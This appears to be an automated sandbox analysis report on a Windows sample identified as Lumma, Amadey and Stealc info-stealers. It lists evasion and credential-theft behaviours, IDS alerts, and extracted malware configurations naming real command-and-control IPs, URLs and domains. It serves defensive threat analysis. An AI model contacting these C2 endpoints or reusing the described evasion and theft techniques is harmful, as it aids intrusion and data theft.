Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540733
MD5: 168a446710f2bab46f3da2d8a92008e2
SHA1: 8c83f817e6b6d98a3a5526dec196f7fc6ed90e54
SHA256: 1d90c40defe396301d00b6fe2d743c2e54f3fa5a8bb2be8800a104283506b1cf
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000009.00000002.1769530723.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 14.2.bd214fbd32.exe.50000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 8138ba21a1.exe.2332.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["spirittunek.store", "studennotediw.store", "dissapoiznw.store", "mobbipenju.store", "clearancek.site", "bathdoomgaz.store", "eaglepawnoy.store", "licendfilteo.site"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 52% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50109 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50146 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000003.1646138104.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779664446.0000000000412000.00000040.00000001.01000000.0000000A.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: number of queries: 1420
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55158 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:65398 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:53069 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:49815 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:56595 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:51406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:50494 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:64796 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49895 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49911 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:59233 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:54108 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:54703 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:57591 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53353 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:53237 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:55001 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49985 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49992 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:64390 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:62475 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:53075 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62175 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:63021 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:60661 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55394 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:52080 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49994 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49999 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:50006 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50029 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:59413 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49922
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50043 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:55751 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:53731 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:52186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:62275 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50047 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:50193 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:55375 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:55742 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:63867 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50082 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50126 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:50137 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49746 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49763 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49763 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49757 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49757 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49800 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49981 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:50049 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49830 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50038 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:50008 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:50005 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50005 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:50036 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:50091 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.7:50091 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:50051 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50051 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49996 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50094 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:50052 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50052 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
